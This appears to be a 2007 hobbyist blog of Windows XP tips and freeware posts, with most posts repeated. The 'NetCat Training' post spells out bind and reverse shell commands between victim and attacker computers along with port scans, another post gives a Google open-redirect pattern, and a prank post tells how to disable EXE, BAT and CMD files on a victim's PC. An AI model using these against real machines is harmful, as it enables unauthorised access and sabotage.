Enable Remote Desktop Connection by Command Prompt on Windows XP!
Download Video + Codes
1.11 MB , Video Lenght: 7:07 mins
Video Format: Avi (Without Codec)
Sunday, December 30, 2007
Thursday, December 13, 2007
Friday, November 30, 2007
Google Blind Redirect Bug
Bug Pattern:
http://images.google.com/imgres?imgurl=[Image URL]&imgrefurl=[Redirect to this URL]
Example:
http://images.google.com/imgres?imgurl=http://www.showandtellonline.com/images_splash/korn.jpg&imgrefurl=http://www.msn.com
If you type the URL above in your browser, you see MSN website.
http://images.google.com/imgres?imgurl=[Image URL]&imgrefurl=[Redirect to this URL]
Example:
http://images.google.com/imgres?imgurl=http://www.showandtellonline.com/images_splash/korn.jpg&imgrefurl=http://www.msn.com
If you type the URL above in your browser, you see MSN website.
Sunday, November 18, 2007
TToUriHex 1.0.0.0
By this software you can converts URL to EscapeHex (Hashed URL), very easily. (+ LowerChar Converting).
*MS WindowsXP & Vista(All Versions) +.NetFramework 2 .0
Download 94.5KB
Zip=Exe(Portable) + VB.Net Source
*MS WindowsXP & Vista(All Versions) +.NetFramework 2 .0
Download 94.5KB
Zip=Exe(Portable) + VB.Net Source
Wednesday, November 7, 2007
Saturday, October 20, 2007
NetCat Training (Elementary)
*Connecting to Remote Machine (TCP):
nc [Remote Machine IP] [Port Number]
nc 86.0.0.1 80
*Connecting to Remote Machine (UDP):
nc [Remote Machine IP] -u [Port Number]
nc 86.0.0.1 -u 1111
*If you want to see the Details:
Use ' -v ' parameter at end of the command line.
nc 86.0.0.1 80 -v
More Verbose:
nc 86.0.0.1 80 -vv
*Listen Mode (TCP):
nc -l -p [Port Number]
nc -l -p 1234
*Listen Mode (UDP):
nc -l -u -p [Port Number]
nc -l -u -p 1234
*Port Scanning (TCP):
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP]
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 86.0.0.1 1-10000
*Port Scanning (UDP):
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP] -u
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 86.0.0.1 -u 1-10000
*Send & Recieve File (1):
File Sending:
nc -l -p [Port Number] -s [Destination Machine IP] < [File Path]
nc -l -p 1234 -s 86.0.0.1 <>
Recieve the File:
nc [File Sending Machine IP] [Port Number] > [File Destination]
nc 87.0.0.1 1234 > E:\Peace (1).jpg
*Send & Recieve File (2):
File Sending:
nc [Destination Machine IP] [Port Number] < [File Path]
nc 86.0.0.1 1111 <>
Recieve the File:
nc -l -p [Port Number] -s [File Sending Machine IP] > [File Destination]
nc -l -p 1111 -s 87.0.0.1 > E:\Peace (1).jpg
*Chatting:
Your Computer:
nc -l -p [Port Number] -s [Remote Machine IP]
nc -l -p 1111 -s 86.0.0.1
Remote Computer:
nc [ Your Computer IP] [Port Number]
nc 87.0.0.1 1111
(Now you can send PM by Console)
*Shell (1):
Victim Computer:
nc -l -p [Port Number] -e [Console Application Path]
nc -l -p 1234 -e cmd.exe
Attacker Computer:
nc [Victim Computer IP] [Port Number(Listen Mode)]
nc 86.0.0.1 1234
(Now you can type your command to execute on victim's computer)
*Shell (2):
Attacker Computer:
nc -l -p [Port Number]
nc -l -p 1234
Victim Computer:
nc [Attacker Computer IP] [Port Number] -e [Console Application Path]
nc 87.0.0.1 1234 -e cmd.exe
(When the victim connects to attacker's computer, attacker can type the code to execute on
victim machine)
*Web Server:
Create a Batch file; like ' WebServer.bat '. Insert line below into the batch file:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [HomePage File Path]
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
...
Batch FileName.bat
nc -l -p 80 -w 1 < HomePage.htm
nc -l -p 80 -w 1 < BackgroundPicture.jpg
nc -l -p 80 -w 1 < BackgroundMusic.mp3
WebServer.bat
(Now type Server IP in your Web Browser(Except Opera))
Note1: We have 65535 Ports.
Note2: If you use ' -d ' parameter at the end of the command, NC will be contiue running
after closing Console Windows (Background Running).
Note3: ' CMD.exe ' (in MS Windows) & ' /bin/sh ' (in Linux)
Download NetCat 1.11 (31 KB - ConsoleApp .EXE)
nc [Remote Machine IP] [Port Number]
nc 86.0.0.1 80
*Connecting to Remote Machine (UDP):
nc [Remote Machine IP] -u [Port Number]
nc 86.0.0.1 -u 1111
*If you want to see the Details:
Use ' -v ' parameter at end of the command line.
nc 86.0.0.1 80 -v
More Verbose:
nc 86.0.0.1 80 -vv
*Listen Mode (TCP):
nc -l -p [Port Number]
nc -l -p 1234
*Listen Mode (UDP):
nc -l -u -p [Port Number]
nc -l -u -p 1234
*Port Scanning (TCP):
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP]
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 86.0.0.1 1-10000
*Port Scanning (UDP):
echo [String to Send] | nc -v -w [Time to Wait (Second)] [Remote Machine IP] -u
[First Port]-[Last Port]
echo QUIT | nc -v -w 3 86.0.0.1 -u 1-10000
*Send & Recieve File (1):
File Sending:
nc -l -p [Port Number] -s [Destination Machine IP] < [File Path]
nc -l -p 1234 -s 86.0.0.1 <>
Recieve the File:
nc [File Sending Machine IP] [Port Number] > [File Destination]
nc 87.0.0.1 1234 > E:\Peace (1).jpg
*Send & Recieve File (2):
File Sending:
nc [Destination Machine IP] [Port Number] < [File Path]
nc 86.0.0.1 1111 <>
Recieve the File:
nc -l -p [Port Number] -s [File Sending Machine IP] > [File Destination]
nc -l -p 1111 -s 87.0.0.1 > E:\Peace (1).jpg
*Chatting:
Your Computer:
nc -l -p [Port Number] -s [Remote Machine IP]
nc -l -p 1111 -s 86.0.0.1
Remote Computer:
nc [ Your Computer IP] [Port Number]
nc 87.0.0.1 1111
(Now you can send PM by Console)
*Shell (1):
Victim Computer:
nc -l -p [Port Number] -e [Console Application Path]
nc -l -p 1234 -e cmd.exe
Attacker Computer:
nc [Victim Computer IP] [Port Number(Listen Mode)]
nc 86.0.0.1 1234
(Now you can type your command to execute on victim's computer)
*Shell (2):
Attacker Computer:
nc -l -p [Port Number]
nc -l -p 1234
Victim Computer:
nc [Attacker Computer IP] [Port Number] -e [Console Application Path]
nc 87.0.0.1 1234 -e cmd.exe
(When the victim connects to attacker's computer, attacker can type the code to execute on
victim machine)
*Web Server:
Create a Batch file; like ' WebServer.bat '. Insert line below into the batch file:
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [HomePage File Path]
nc -l -p 80 -w [Time to wait for Client (Seconds)] < [Other files path]
...
Batch FileName.bat
nc -l -p 80 -w 1 < HomePage.htm
nc -l -p 80 -w 1 < BackgroundPicture.jpg
nc -l -p 80 -w 1 < BackgroundMusic.mp3
WebServer.bat
(Now type Server IP in your Web Browser(Except Opera))
Note1: We have 65535 Ports.
Note2: If you use ' -d ' parameter at the end of the command, NC will be contiue running
after closing Console Windows (Background Running).
Note3: ' CMD.exe ' (in MS Windows) & ' /bin/sh ' (in Linux)
Download NetCat 1.11 (31 KB - ConsoleApp .EXE)
Sunday, October 7, 2007
TAlarmClock 2.0.0.0 Beta
A useful Digital Alarm Clock for your computer!
409 KB Download (+ VB.net Source)
ZIP = .EXE & .MSI
Unzip and then install!
409 KB Download (+ VB.net Source)
ZIP = .EXE & .MSI
Unzip and then install!
Sunday, September 16, 2007
TY!IDFinder 1.0.0.3 Beta
YahooIDFinder is an easy-to-use program to find the list of Yahoo!IDs that have been logged in, with Yahoo! Messenger; in the PC.
YahooIDFinder supports Yahoo! Messenger 7.5, 8.0 & 8.1 .
* ID Search
* ID Deleter
* ID List Saver +Report
* Font & Color Settings
* Fast Scanning +Progress Bar
System Requirements:
MS Windows (& Vista) All Version +.NetFramework2.0
500 KB Free space
Download 174KB
Portable Software(.Exe) + VB.net Source
YahooIDFinder supports Yahoo! Messenger 7.5, 8.0 & 8.1 .
* ID Search
* ID Deleter
* ID List Saver +Report
* Font & Color Settings
* Fast Scanning +Progress Bar
System Requirements:
MS Windows (& Vista) All Version +.NetFramework2.0
500 KB Free space
Download 174KB
Portable Software(.Exe) + VB.net Source
TFileDeleter 1.0.0.0 Beta
TFileDeleter is a software(File Shredder) that deletes your selected files for ever, so you can't recover them.
This software has been test on FAT32 and NTFS, but it may works on another File System[Like: ZFS(Apple MAC, Leopard & Tiger), Type 8E(Fedora Core Linux), Linux Ext3(Common Linux FS), FAT16 & FAT12], too.
System Requirements:
*All MS Windows Version(& Vista) +.NET Framework2.0
*Linux +Mono Project
*Apple MAX OS
**500 KB Free space
Download 141KB
Portable Software(.Exe) + VB.net Source
This software has been test on FAT32 and NTFS, but it may works on another File System[Like: ZFS(Apple MAC, Leopard & Tiger), Type 8E(Fedora Core Linux), Linux Ext3(Common Linux FS), FAT16 & FAT12], too.
System Requirements:
*All MS Windows Version(& Vista) +.NET Framework2.0
*Linux +Mono Project
*Apple MAX OS
**500 KB Free space
Download 141KB
Portable Software(.Exe) + VB.net Source
Thursday, September 13, 2007
TObjectDock 1.0.0.0 Beta
A small and cute dock on your desktop, that helps you to launch your files(All Files Support) very easily.
*10 Buttons
*21 MB - Max Ram Usage
*35% - Max CPU Usage
*All Images supported for 'Button BG Image'
*Unicode Support
*Color & Font Settings for 'Labels'
*Transparent Label BG Color
*Vertical & Horizental mode
*Time & Date view
*Simple Visual ButtonEffect
System Requirements:
All MS Windows Version(& Vista) +.Net Framework2.0
500 KB Freespace on HDD
Download 254KB
Portable File(Exe) + VB.net Source
*10 Buttons
*21 MB - Max Ram Usage
*35% - Max CPU Usage
*All Images supported for 'Button BG Image'
*Unicode Support
*Color & Font Settings for 'Labels'
*Transparent Label BG Color
*Vertical & Horizental mode
*Time & Date view
*Simple Visual ButtonEffect
System Requirements:
All MS Windows Version(& Vista) +.Net Framework2.0
500 KB Freespace on HDD
Download 254KB
Portable File(Exe) + VB.net Source
Wednesday, September 5, 2007
TObjectDock (Demo Version)
A little dock on your desktop, that you can set it very easily!
*10 Docks
*UniCode Supports
*Font & Color Settings
*All files support
*Most button images support
*Transparent BackColor
Problems:
1-18 MB Ram Usage
2-Problem for Loading Settings form
The problem will be fixed on Beta version! Coming Soon...
Download Demo Version (251 KB, EXE file)
ِ
*10 Docks
*UniCode Supports
*Font & Color Settings
*All files support
*Most button images support
*Transparent BackColor
Problems:
1-18 MB Ram Usage
2-Problem for Loading Settings form
The problem will be fixed on Beta version! Coming Soon...
Download Demo Version (251 KB, EXE file)
ِ
Saturday, August 18, 2007
Monday, August 13, 2007
Changing Icon of a special type of file
Go to ' My Computer '. In menu bar, go to ' Tools>Folder Options '. In new window, go to ' File Types ' tab.
Select your extensions in Registered file types. Hit ' Advanced '. In Edit File Type window, hit ' Change Icon '.
In Change Icon window, you can select your icon. By Browse button, you can explore in more places.
Hit Ok. Hit Ok again. At Last hit Close.
By Registry Editor:
Type ' regedit ' in Run (Press Winkey + R ) to open Registry Editor . Go to ' HKEY_CLASSES_ROOT\(the extension) ' ; for example, ' HKEY_CLASSES_ROOT\.bmp '.
In right part double click on ' (Default) '. In new window check the Value data. Then go to ' HKEY_CLASSES_ROOT\(Value data)\DefaultIcon '; for example ' HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon '.
In right part double click on ' (Default) ' to modify it. In Value data part, type the path of your Icon or Exe file. At last hit Ok & close Registry Editor .
Select your extensions in Registered file types. Hit ' Advanced '. In Edit File Type window, hit ' Change Icon '.
In Change Icon window, you can select your icon. By Browse button, you can explore in more places.
Hit Ok. Hit Ok again. At Last hit Close.
By Registry Editor:
Type ' regedit ' in Run (Press Winkey + R ) to open Registry Editor . Go to ' HKEY_CLASSES_ROOT\(the extension) ' ; for example, ' HKEY_CLASSES_ROOT\.bmp '.
In right part double click on ' (Default) '. In new window check the Value data. Then go to ' HKEY_CLASSES_ROOT\(Value data)\DefaultIcon '; for example ' HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon '.
In right part double click on ' (Default) ' to modify it. In Value data part, type the path of your Icon or Exe file. At last hit Ok & close Registry Editor .
Thursday, August 9, 2007
THackerChar
THackerChar converts your normal text to hackers alphabet.
Just type your text & THC converts it instantly.
100 KB Free Space
MS Windows XP (+ .NET Framework 2.2)
MS Windows Vista (All Version)
Linux (+ Mono Project)
Download 22 KB
Zip file = .EXE (File Only)
Just type your text & THC converts it instantly.
100 KB Free Space
MS Windows XP (+ .NET Framework 2.2)
MS Windows Vista (All Version)
Linux (+ Mono Project)
Download 22 KB
Zip file = .EXE (File Only)
Tuesday, July 24, 2007
TTrainingScreen 1.0.0.1 Beta
Draw what ever you like on your captured picture!
+ Rectangle
+ Ellipse
+ Line
+ Freehand (Pencil)
+ Text Draw (+Font without Style)
+ Unicode Support
+ Color Support (-Text)
+ Picture Saving
+ ToolStrip AutoHide
+ Line Width
+ Easy to Use (+Notify Icon)
System Requirement:
MS Windows XP + .NET Framework 2.2
MS Windows Vista (All version)
1 MB Free Space
Note: If you use TrainingScreen, you can clean your Temp folder each week.
How to Clean: Type ' %temp% ' in Run & delete unimportant files(TTSPRTSC#.jpg).
Download + VB.NET Source
737 KB Zip File = Exe + Msi (UnZip & then Install)
+ Rectangle
+ Ellipse
+ Line
+ Freehand (Pencil)
+ Text Draw (+Font without Style)
+ Unicode Support
+ Color Support (-Text)
+ Picture Saving
+ ToolStrip AutoHide
+ Line Width
+ Easy to Use (+Notify Icon)
System Requirement:
MS Windows XP + .NET Framework 2.2
MS Windows Vista (All version)
1 MB Free Space
Note: If you use TrainingScreen, you can clean your Temp folder each week.
How to Clean: Type ' %temp% ' in Run & delete unimportant files(TTSPRTSC#.jpg).
Download + VB.NET Source
737 KB Zip File = Exe + Msi (UnZip & then Install)
Saturday, July 21, 2007
A way to bug someone
Victim says: "I can not open Exe files?!?!? "
Type ' regedit ' in Run (Press WinKey+R ) to open Registry Editor.
Go to ' HKEY_CLASSES_ROOT\.exe '. In right part, open ' (Default) '.
In Value data, type ' txtfile ' instead of ' exefile '. Hit OK & close Registry Editor. Then the .EXE files will be open in Notepad .
Note: If you type the path of your Exe file in ' .CMD ' or ' .BAT ' files, the Exe files will not be open in Notepad.
If you want to disable .BAT files, type ' regedit ' in Run (Press WinKey+R ) to open Registry Editor.
Go to ' HKEY_CLASSES_ROOT\.bat '. In right part, open ' (Default) '.
In Value data, type ' txtfile ' instead of ' batfile '. Hit OK.
If you want to disable .CMD files, type ' regedit ' in Run (Press WinKey+R ) to open Registry Editor.
Go to ' HKEY_CLASSES_ROOT\.cmd '. In right part, open ' (Default) '.
In Value data, type ' txtfile ' instead of ' cmdfile '. Hit OK & close Registry Editor.
By the file that you see below you can do these actions very fast. Download the files & unzip them. Then Right-Click on the file & hit ' Merge '.
Disable EXE, BAT & CMD files (ZIP file - 207Bytes)
Enable EXE, BAT & CMD files (ZIP file - 255Bytes) for fixing!
Type ' regedit ' in Run (Press WinKey+R ) to open Registry Editor.
Go to ' HKEY_CLASSES_ROOT\.exe '. In right part, open ' (Default) '.
In Value data, type ' txtfile ' instead of ' exefile '. Hit OK & close Registry Editor. Then the .EXE files will be open in Notepad .
Note: If you type the path of your Exe file in ' .CMD ' or ' .BAT ' files, the Exe files will not be open in Notepad.
If you want to disable .BAT files, type ' regedit ' in Run (Press WinKey+R ) to open Registry Editor.
Go to ' HKEY_CLASSES_ROOT\.bat '. In right part, open ' (Default) '.
In Value data, type ' txtfile ' instead of ' batfile '. Hit OK.
If you want to disable .CMD files, type ' regedit ' in Run (Press WinKey+R ) to open Registry Editor.
Go to ' HKEY_CLASSES_ROOT\.cmd '. In right part, open ' (Default) '.
In Value data, type ' txtfile ' instead of ' cmdfile '. Hit OK & close Registry Editor.
By the file that you see below you can do these actions very fast. Download the files & unzip them. Then Right-Click on the file & hit ' Merge '.
Disable EXE, BAT & CMD files (ZIP file - 207Bytes)
Enable EXE, BAT & CMD files (ZIP file - 255Bytes) for fixing!
Thursday, July 12, 2007
TTextEffector 1.0.0.1 Beta
System Requirement:
*Windows XP + .NET Framework 2.2
**All MSWindows Vista Version
***Linux + MonoProject
****Apple MacOSx ,Leopard & Tiger
2 MB Freespace
Download Setup + Source
ZIP File [Exe & Msi] Size: 530 KB
Monday, July 9, 2007
TTextEffector 1.0.0.0 Beta
TTextEffector 1.0.0.0 Beta
A free, useful & small software for making beautiful introduction. Try It!!!
+Unicode Support
+Introduction Source
+WAV Background Music
+All image format supported
+Icon Support
+Auto Run Maker
+Opacity Control
+Advanced Window Options
+Mute/Play Button
+Effect Upgrade Support
+Preview Window
Download(Files Only)
182 KBs - ZIP file
A free, useful & small software for making beautiful introduction. Try It!!!
+Unicode Support
+Introduction Source
+WAV Background Music
+All image format supported
+Icon Support
+Auto Run Maker
+Opacity Control
+Advanced Window Options
+Mute/Play Button
+Effect Upgrade Support
+Preview Window
Download(Files Only)
182 KBs - ZIP file
Friday, June 22, 2007
Send message on LAN
Type ' services.msc ' in Run. In menu bar; go to Action > Connect to another computer ... .
Type name of the computer that you want to send message to it. Hit OK.
Then in menu bar; go to Action > All Tasks > Send Console Message... .
In Message part, type your message. Finally hit Send.
Note1: To see the names of computer on the LAN, in menu bar; go to Action > Connect to another computer ... . Hit Browse. In new window, hit Advanced ... . Then hit Find in new window. At the bottom of the window, you can see the Computer's Name.
Note2: You can type ' cmd ' in Run & then type ' net view ' in Command Prompt, to see the compter names on LAN
Note3: Hit OK if any kind of error occur & continue.
Type name of the computer that you want to send message to it. Hit OK.
Then in menu bar; go to Action > All Tasks > Send Console Message... .
In Message part, type your message. Finally hit Send.
Note1: To see the names of computer on the LAN, in menu bar; go to Action > Connect to another computer ... . Hit Browse. In new window, hit Advanced ... . Then hit Find in new window. At the bottom of the window, you can see the Computer's Name.
Note2: You can type ' cmd ' in Run & then type ' net view ' in Command Prompt, to see the compter names on LAN
Note3: Hit OK if any kind of error occur & continue.
Saturday, June 16, 2007
Useful Notes 3
11-Do you want to see WinXP Tooltips?
Type ' regedit ' in Run to open Registry Editor. Go to ' HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Tips '.
Now you can see the tooltips in String Value.
12-Do you want to hide a file in another file?
Copy the file that you want to hide to a folder; for example ' D:\Folder '. The file should a compress file like ZIP, RAR ,TAR and ... .
Copy other file (The hidden file will be attach to this file) to the folder that contains the file that you want to hide; here is ' D:\Folder '.
Type ' CMD ' in Run to open Command Prompt . Type ' D: ' in Command Prompt . Type ' cd ' and the path of the folder that contains the file that you want to hide in Command Prompt ; here is 'cd D:\Folder '.
Type ' Copy /b 1stFile + 2ndFile 3rdFile '. 1stFile is the name of the file that The hidden file will be attach to it.
2ndFile is the name of the file that you want to hide it.
3rdFile is the name of the file that will be produced and contians the hidden file. For example ' copy /b File1.jpg + File2.zip File3.bmp '.
To run the hidden file open 3rdFile (here is File3.bmp ) by WinRAR, WinZIP ,KGB and ... .
Note: The extension of First file and Third file can not be Z, ZIP, RAR, TAR and ... .
13-Do you want to change the name of Guest User Account?
Turn on Guest user. Type ' control userpasswords2 ' in Run. Click on Guest . Hit Properties. In
new window, type the new name for the user.Then hit OK.
14-Do you want to make font by WinXP?
Type ' eudcedit ' in Run and start creating new font.
15-Do you want to make Setup (Wizard) by WinXP?
Type ' iexpress ' in Run.
Type ' regedit ' in Run to open Registry Editor. Go to ' HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Tips '.
Now you can see the tooltips in String Value.
12-Do you want to hide a file in another file?
Copy the file that you want to hide to a folder; for example ' D:\Folder '. The file should a compress file like ZIP, RAR ,TAR and ... .
Copy other file (The hidden file will be attach to this file) to the folder that contains the file that you want to hide; here is ' D:\Folder '.
Type ' CMD ' in Run to open Command Prompt . Type ' D: ' in Command Prompt . Type ' cd ' and the path of the folder that contains the file that you want to hide in Command Prompt ; here is 'cd D:\Folder '.
Type ' Copy /b 1stFile + 2ndFile 3rdFile '. 1stFile is the name of the file that The hidden file will be attach to it.
2ndFile is the name of the file that you want to hide it.
3rdFile is the name of the file that will be produced and contians the hidden file. For example ' copy /b File1.jpg + File2.zip File3.bmp '.
To run the hidden file open 3rdFile (here is File3.bmp ) by WinRAR, WinZIP ,KGB and ... .
Note: The extension of First file and Third file can not be Z, ZIP, RAR, TAR and ... .
13-Do you want to change the name of Guest User Account?
Turn on Guest user. Type ' control userpasswords2 ' in Run. Click on Guest . Hit Properties. In
new window, type the new name for the user.Then hit OK.
14-Do you want to make font by WinXP?
Type ' eudcedit ' in Run and start creating new font.
15-Do you want to make Setup (Wizard) by WinXP?
Type ' iexpress ' in Run.
Tuesday, June 12, 2007
Set a Background Image for your Drives
Open Notepad (Type ' notepad ' in Run). Type the text that you see below:
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image= MyPicture
[.ShellClassInfo] ConfirmFileOp=0
// Created by Mohandes Zalatan
Change ' MyPicture ' to your image path. For example ' IconArea_Image= D:\My Folder\Picture.jpg ' (All Image Format Supported! ).
Now save it with this name ' Desktop.txt '. Change the extension to INI : ' Desktop.txt ' to ' Desktop.ini ' . Copy ' Desktop.ini ' to your drives (C:, D:, E: & ...).
You can not copy the file to subfolders on your drives, like: C:\My Picture or D:\Family.
Note: To see extensions of files, Go to ' My Computer>Tools>Folder Options>View '. Then Unmark ' Hide extensions for known file types '.
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image= MyPicture
[.ShellClassInfo] ConfirmFileOp=0
// Created by Mohandes Zalatan
Change ' MyPicture ' to your image path. For example ' IconArea_Image= D:\My Folder\Picture.jpg ' (All Image Format Supported! ).
Now save it with this name ' Desktop.txt '. Change the extension to INI : ' Desktop.txt ' to ' Desktop.ini ' . Copy ' Desktop.ini ' to your drives (C:, D:, E: & ...).
You can not copy the file to subfolders on your drives, like: C:\My Picture or D:\Family.
Note: To see extensions of files, Go to ' My Computer>Tools>Folder Options>View '. Then Unmark ' Hide extensions for known file types '.
Hide Control Panel Icons
For hiding Control Panel Icons, Type ' regedit ' in Run. Go to ' HKEY_CURRENT_USER\Control Panel\don't load '. Create a String Value (Right-click on right part of Registry Editor and hit New>String Value ). Rename the String Value to your CPL (Control Panel Extension ) file name.
For example, ' firewall.cpl '. Then open the String Value; here is ' firewall.cpl '; to modify it. Type ' No ' in Value data text box and hit OK. Close Registry Editor.
If you want to show the Icon delete the String Value that you created.
Some CPL (Control Panel Extension ) :
access.cpl Accessibility Options
appwiz.cpl Add or Remove Programs
bthprops.cpl Bluetooth Devices
desk.cpl Display Properties
firewall.cpl Windows Firewall
hdwwiz.cpl Add Hardware Wizard
inetcpl.cpl Internet Properties
intl.cpl Regional and Languane Options
irprops.cpl Wireless Link
joy.cpl Game Controllers
main.cpl Mouse Properties
mmsys.cpl Sounds and Audio Devices Properties
ncpa.cpl Network Connections
netsetup.cpl Network Setup Wizard
nusrmgr.cpl User Accounts
odbccp32.cpl ODBC Data Source Administrator
powercfg.cpl Power Options Properties
sysdm.cpl System Properties
telephon.cpl Phone and Modem Options
timedate.cpl Date and Time Properties
wscui.cpl Windows Security Center
wuaucpl.cpl Automatic Updates
For example, ' firewall.cpl '. Then open the String Value; here is ' firewall.cpl '; to modify it. Type ' No ' in Value data text box and hit OK. Close Registry Editor.
If you want to show the Icon delete the String Value that you created.
Some CPL (Control Panel Extension ) :
access.cpl Accessibility Options
appwiz.cpl Add or Remove Programs
bthprops.cpl Bluetooth Devices
desk.cpl Display Properties
firewall.cpl Windows Firewall
hdwwiz.cpl Add Hardware Wizard
inetcpl.cpl Internet Properties
intl.cpl Regional and Languane Options
irprops.cpl Wireless Link
joy.cpl Game Controllers
main.cpl Mouse Properties
mmsys.cpl Sounds and Audio Devices Properties
ncpa.cpl Network Connections
netsetup.cpl Network Setup Wizard
nusrmgr.cpl User Accounts
odbccp32.cpl ODBC Data Source Administrator
powercfg.cpl Power Options Properties
sysdm.cpl System Properties
telephon.cpl Phone and Modem Options
timedate.cpl Date and Time Properties
wscui.cpl Windows Security Center
wuaucpl.cpl Automatic Updates
Sunday, June 10, 2007
Useful Notes 2
6-Your computer information (Network) =Type ' hcp://system/netdiag/dglogs.htm ' in Run.
7-Your computer information (Normal & Advanced) = Type ' hcp://system/sysinfo/sysinfomain.htm ', (Normal) or ' hcp://system/sysinfo/sysInfoLaunch.htm ', (Advanced) in Run.
8-Do you want to add a background image to your Desktop Background list?
Copy your favorite image to ' %windir%\WEB\Wallpaper '.
9-Do you want to chat with your friends on Internet or LAN (Local Area Network )?
Type ' winchat ' in Run.
10-A useful commands for your browser?
Type ' about:config ' in Opera or FireFox address bar to see Avdvanced Settings.
7-Your computer information (Normal & Advanced) = Type ' hcp://system/sysinfo/sysinfomain.htm ', (Normal) or ' hcp://system/sysinfo/sysInfoLaunch.htm ', (Advanced) in Run.
8-Do you want to add a background image to your Desktop Background list?
Copy your favorite image to ' %windir%\WEB\Wallpaper '.
9-Do you want to chat with your friends on Internet or LAN (Local Area Network )?
Type ' winchat ' in Run.
10-A useful commands for your browser?
Type ' about:config ' in Opera or FireFox address bar to see Avdvanced Settings.
Thursday, June 7, 2007
Useful Notes 1
1-Do you want to see you system info?
Type ' msinfo32 ' in Run (WinKey + R).
2-Do you know how to open a folder in Windows XP Explorer by CMD?
Open notepad (Type ' notepad ' in Run). Type ' explorer /e, FolderName ' in notepad; for example: ' explorer /e, C:\My Folder '. Save it; for example: ' Text.txt '. Change the extension of the file that you saved it by notepad to ' *.bat '; here is like this: ' Text.txt ' is changed to '' Text.bat '. Finished. Now run your file, Text.bat .
Note: To see extensions of files, Go to ' My Computer>Tools>Folder Options>View '. Then Unmark ' Hide extensions for known file types '.
3-Do you want to see your Search History on Windows XP?
Press ' WinKey + R ' to open Run. Type ' regedit 'to open Registry Editor. Go to ' HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603 ' or ' HKEY_USERS\S-1-5-21-73586283-261478967-839522115-1003\Software\Microsoft\Search Assistant\ACMru '.
4-Do you want to change color of Windows XP part?
Press ' WinKey + R ' to open Run. Type ' regedit 'to open Registry Editor. Go to ' HKEY_CURRENT_USER\Control Panel\Colors '.
5-Windows XP Glossary = %windir%\Help\glossary.chm .
Type ' msinfo32 ' in Run (WinKey + R).
2-Do you know how to open a folder in Windows XP Explorer by CMD?
Open notepad (Type ' notepad ' in Run). Type ' explorer /e, FolderName ' in notepad; for example: ' explorer /e, C:\My Folder '. Save it; for example: ' Text.txt '. Change the extension of the file that you saved it by notepad to ' *.bat '; here is like this: ' Text.txt ' is changed to '' Text.bat '. Finished. Now run your file, Text.bat .
Note: To see extensions of files, Go to ' My Computer>Tools>Folder Options>View '. Then Unmark ' Hide extensions for known file types '.
3-Do you want to see your Search History on Windows XP?
Press ' WinKey + R ' to open Run. Type ' regedit 'to open Registry Editor. Go to ' HKEY_CURRENT_USER\Software\Microsoft\Search Assistant\ACMru\5603 ' or ' HKEY_USERS\S-1-5-21-73586283-261478967-839522115-1003\Software\Microsoft\Search Assistant\ACMru '.
4-Do you want to change color of Windows XP part?
Press ' WinKey + R ' to open Run. Type ' regedit 'to open Registry Editor. Go to ' HKEY_CURRENT_USER\Control Panel\Colors '.
5-Windows XP Glossary = %windir%\Help\glossary.chm .
Wednesday, June 6, 2007
WinXP Environment
You want to go to D:\Folder1\Folder2\Folder3\Folder4\Folder5 . But with XP Environment; type %anything% in Run & go to your directory. But how?
Press WinKey + R to open Run. Type ' regedit ' to open Regisrty Editor. Go to ' HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment '. Create a string value & choose a name for it; for example ' myfolder '. Open your string value to modify it; here is myfolder . Type the path of your folder or file; for example ' D:\Folder1\Folder2\Folder3\Folder4\Folder5 ' or ' D:\Folder1\Folder2\Folder3\Folder4\Folder5\Text.txt '. Close the Registry Editor. Log off & then Log on. Now type %your string value name%; here is %myfolder%, in Run (WinKey + R). Now you see your folder or file.
Note: The Registry path ' ControSet001 ' can be ' ControlSet002 ' or ' ControlSet003 '.
Press WinKey + R to open Run. Type ' regedit ' to open Regisrty Editor. Go to ' HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment '. Create a string value & choose a name for it; for example ' myfolder '. Open your string value to modify it; here is myfolder . Type the path of your folder or file; for example ' D:\Folder1\Folder2\Folder3\Folder4\Folder5 ' or ' D:\Folder1\Folder2\Folder3\Folder4\Folder5\Text.txt '. Close the Registry Editor. Log off & then Log on. Now type %your string value name%; here is %myfolder%, in Run (WinKey + R). Now you see your folder or file.
Note: The Registry path ' ControSet001 ' can be ' ControlSet002 ' or ' ControlSet003 '.
Subscribe to:
Posts (Atom)